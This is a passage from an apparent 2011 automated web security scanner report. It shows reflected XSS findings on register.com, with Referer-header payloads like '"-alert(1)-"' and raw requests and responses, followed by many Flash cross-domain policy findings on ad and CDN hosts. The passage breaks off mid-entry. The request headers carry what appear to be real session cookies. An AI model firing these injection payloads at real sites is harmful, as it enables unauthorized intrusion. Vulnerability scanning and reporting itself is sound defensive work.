GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=35db8"-alert(1)-"435739ce645
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:12:57 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=71D10E28389822DF56D6996222F9628D.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=2eebf6c5fd804083704d9b02ca9b3f46abf8bee842bc06ca4e62a5cd60ac0ec50a2f7973; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 31335
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=35db8"-alert(1)-"435739ce645";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.26. http://www.register.com/unauthenticated_session_expired.rcmx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.register.com
Path:   /unauthenticated_session_expired.rcmx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2064"-alert(1)-"625a6b7fc7b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unauthenticated_session_expired.rcmx?opener=/domain/searchresults.rcmx HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e2064"-alert(1)-"625a6b7fc7b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547; OAX=Mhd7ak5inIsACxRd; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.2.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:14:57 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 23259
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=e2064"-alert(1)-"625a6b7fc7b";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5. Flash cross-domain policy
There are 29 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://adx.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:41:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:29 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.2. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sat, 03 Sep 2011 23:16:57 GMT
Date: Fri, 02 Sep 2011 23:16:57 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 80212

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.3. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sat, 03 Sep 2011 21:33:49 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.4. http://c.mouseflow.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.mouseflow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.mouseflow.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 20 Apr 2011 14:02:32 GMT
Accept-Ranges: bytes
ETag: "3e38109863ffcb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 03 Sep 2011 21:34:45 GMT
Connection: close
Content-Length: 103

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://c7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5087
Date: Sat, 03 Sep 2011 21:40:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.6. http://cspix.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.7. http://d.adroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:38:09 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 24 Aug 2011 20:02:29 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.8. http://d3.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Sat, 03 Sep 2011 21:40:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.9. http://d7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2079
Date: Sat, 03 Sep 2011 21:40:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.10. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 17:34:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 17:34:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.11. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 03 Sep 2011 21:34:03 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.12. http://imagesak.securepaynet.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imagesak.securepaynet.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesak.securepaynet.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:46:19 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.13. http://img1.wsimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:f90"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:30:11 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.14. http://img3.wsimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:f90"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:28:59 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.15. http://m.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:38:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:38:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.16. http://registercom.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://registercom.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: registercom.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 03 Sep 2011 21:32:02 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

5.17. http://s.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 03 Sep 2011 21:33:54 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.18. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 03 Sep 2011 17:32:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.19. http://value.register.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://value.register.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: value.register.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:56 GMT
Server: Omniture DC/2.0.0
xserver: www264
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.20. http://www.wunderground.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:30 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 03 Mar 2011 23:03:36 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.21. http://ads.lfstmedia.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.lfstmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.lfstmedia.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sat, 03 Sep 2011 21:40:39 GMT
Content-Type: text/xml
Content-Length: 376
Last-Modified: Sat, 03 Sep 2011 21:33:15 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*.dmajet.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lifestreetmedia.com" secure="false"/>
...[SNIP]...

5.22. http://edge.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
Date: Sat, 03 Sep 2011 21:36:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.23. http://login.dotomi.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

